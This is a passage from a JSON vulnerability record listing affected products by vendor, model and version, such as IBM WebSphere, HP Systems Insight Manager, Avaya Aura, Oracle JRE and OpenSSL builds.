            "version": "3.2.0.0"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0.9"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "websphere process server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.5"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.2.0"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.6"
          },
          {
            "_id": null,
            "model": "system m3 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x363073770"
          },
          {
            "_id": null,
            "model": "security access manager for mobile",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.0"
          },
          {
            "_id": null,
            "model": "cics transaction gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "aura conferencing sp7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37006.4"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.1841"
          },
          {
            "_id": null,
            "model": "database 12c release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "112.11"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "netezza platform software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "linux enterprise module for legacy software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "12"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0"
          },
          {
            "_id": null,
            "model": "infosphere identity insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.21"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ae2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v90007.5.1.0"
          },
          {
            "_id": null,
            "model": "thinpro linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "(x86)4.4"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.9.5"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.8.179"
          },
          {
            "_id": null,
            "model": "aura utility services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.010"
          },
          {
            "_id": null,
            "model": "tivoli netcool configuration manager if",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.3.0.6003"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.027"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.022"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.4"
          },
          {
            "_id": null,
            "model": "aura system manager sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser ifix10",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.5.2"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.5.3"
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "4.15"
          },
          {
            "_id": null,
            "model": "security appscan standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.2"
          },
          {
            "_id": null,
            "model": "telepresence conductor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "norman shark network protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "video surveillance 4300e/4500e high-definition ip cameras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.2.0.5"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "system type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x3950x638370"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "cognos insight standard edition fp if",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2.124"
          },
          {
            "_id": null,
            "model": "sametime",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.2.0"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "rational agent controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "aura utility services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "sterling control center ifix04",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.2.1"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.6.1.1"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.8.5"
          },
          {
            "_id": null,
            "model": "java sdk sr16-fp8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "system m3 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x365054540"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.04"
          },
          {
            "_id": null,
            "model": "platform cluster manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "jdk update17",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "ctpos 6.6r5",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35006.3"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.1.0.7"
          },
          {
            "_id": null,
            "model": "pureapplication system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.13"
          },
          {
            "_id": null,
            "model": "websphere real time sr fp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3810"
          },
          {
            "_id": null,
            "model": "domino if",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.07"
          },
          {
            "_id": null,
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "tivoli asset management for it",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2"
          },
          {
            "_id": null,
            "model": "rational developer for aix and cobol",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "workcentre 3025bi",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "3.50.01.10"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser ifix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.5.0.212"
          },
          {
            "_id": null,
            "model": "tivoli common reporting",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.1"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.033"
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "netscaler service delivery appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "cognos insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "mysql server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "5.6.22"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.2.7"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0.1"
          },
          {
            "_id": null,
            "model": "clustered data ontap antivirus connector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.2"
          },
          {
            "_id": null,
            "model": "sterling control center ifix03",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.1.0"
          },
          {
            "_id": null,
            "model": "telepresence mcu",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "53000"
          },
          {
            "_id": null,
            "model": "jre 1.6.0 31",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.021"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "jdk 0 03",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "java sdk sr9",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "jdk update20",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "db2 query management facility",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "session border controller for enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3.0"
          },
          {
            "_id": null,
            "model": "communication server 1000e signaling server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "telepresence isdn gw mse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "83210"
          },
          {
            "_id": null,
            "model": "bbm on ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0"
          },
          {
            "_id": null,
            "model": "tivoli monitoring fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.302"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "cics transaction gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0.10"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.4"
          },
          {
            "_id": null,
            "model": "network node manager ispi performance for qa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "systems insight manager 7.4.0a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.7"
          },
          {
            "_id": null,
            "model": "blend for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.4"
          },
          {
            "_id": null,
            "model": "rational build utility",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.4.750"
          },
          {
            "_id": null,
            "model": "system m5 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x325054580"
          },
          {
            "_id": null,
            "model": "security identity manager virtual appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "chassis management module 2peo12i",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3.4"
          },
          {
            "_id": null,
            "model": "notes fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.36"
          },
          {
            "_id": null,
            "model": "tivoli storage manager for virtual environments",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.3.0.0"
          },
          {
            "_id": null,
            "model": "lotus quickr for websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "flashcopy manager for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.0"
          },
          {
            "_id": null,
            "model": "flashcopy manager for custom applications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.4"
          },
          {
            "_id": null,
            "model": "thinpro linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "(x86)5.1"
          },
          {
            "_id": null,
            "model": "cognos tm1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1.1"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.060"
          },
          {
            "_id": null,
            "model": "flashcopy manager for unix and linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.1"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10c",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.02"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.3.1"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10f",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "tivoli network performance manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.3.3"
          },
          {
            "_id": null,
            "model": "sterling control center ifix02",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.34"
          },
          {
            "_id": null,
            "model": "jdk update21",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0.1"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1.10"
          },
          {
            "_id": null,
            "model": "rational developer for aix and cobol",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2.6"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "upward integration modules scvmm add-in",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.3"
          },
          {
            "_id": null,
            "model": "java sdk sr13-fp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0d",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "system m3 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x355042540"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.1e",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "network node manager ispi performance for metrics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.029"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.6"
          },
          {
            "_id": null,
            "model": "pureapplication system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.3.5"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.2"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0.1"
          },
          {
            "_id": null,
            "model": "one-x client enablement services sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "x-series xos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "9.7"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.5.2"
          },
          {
            "_id": null,
            "model": "blend for ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser user interface",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4.10"
          },
          {
            "_id": null,
            "model": "systems insight manager 7.3.0a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.06"
          },
          {
            "_id": null,
            "model": "tivoli monitoring fp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.1.5"
          },
          {
            "_id": null,
            "model": "websphere process server hypervisor edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "phaser",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "30523.50.01.11"
          },
          {
            "_id": null,
            "model": "cognos business intelligence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1.1"
          },
          {
            "_id": null,
            "model": "work space manager for bes10/bes12 24651 124",
            "scope": null,
            "trust": 0.3,
            "vendor": "blackberry",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.1.3"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1.1"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.1.0.842"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.28"
          },
          {
            "_id": null,
            "model": "xiv storage system gen3 a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.0"
          },
          {
            "_id": null,
            "model": "one-x client enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0.0"
          },
          {
            "_id": null,
            "model": "telepresence te software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.030"
          },
          {
            "_id": null,
            "model": "real-time compression appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.9.1.11"
          },
          {
            "_id": null,
            "model": "java sdk sr13",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6"
          },
          {
            "_id": null,
            "model": "tivoli monitoring fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2.209"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 09-b03",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.9"
          },
          {
            "_id": null,
            "model": "systems insight manager sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.41"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "tandberg codian mse model",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "83200"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler for applications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "tivoli storage manager for virtual environments",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4.0.0"
          },
          {
            "_id": null,
            "model": "flex system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.3.1.0"
          },
          {
            "_id": null,
            "model": "enterprise linux server eus 6.6.z",
            "scope": null,
            "trust": 0.3,
            "vendor": "redhat",
            "version": null
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3.0.4"
          },
          {
            "_id": null,
            "model": "norman shark network protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.051"
          },
          {
            "_id": null,
            "model": "security appscan standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.7"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "flashcopy manager for oracle with sap environments",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.0"
          },
          {
            "_id": null,
            "model": "db2 connect application server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8m",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "bbm on windows phone",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "2.0.0.25"
          },
          {
            "_id": null,
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "flashcopy manager for oracle with sap environments",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.1.2"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.2.4"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.42"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "jre update30",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.300"
          },
          {
            "_id": null,
            "model": "java sdk 7r1 sr1",
            "scope": null,
            "trust": 0.3,
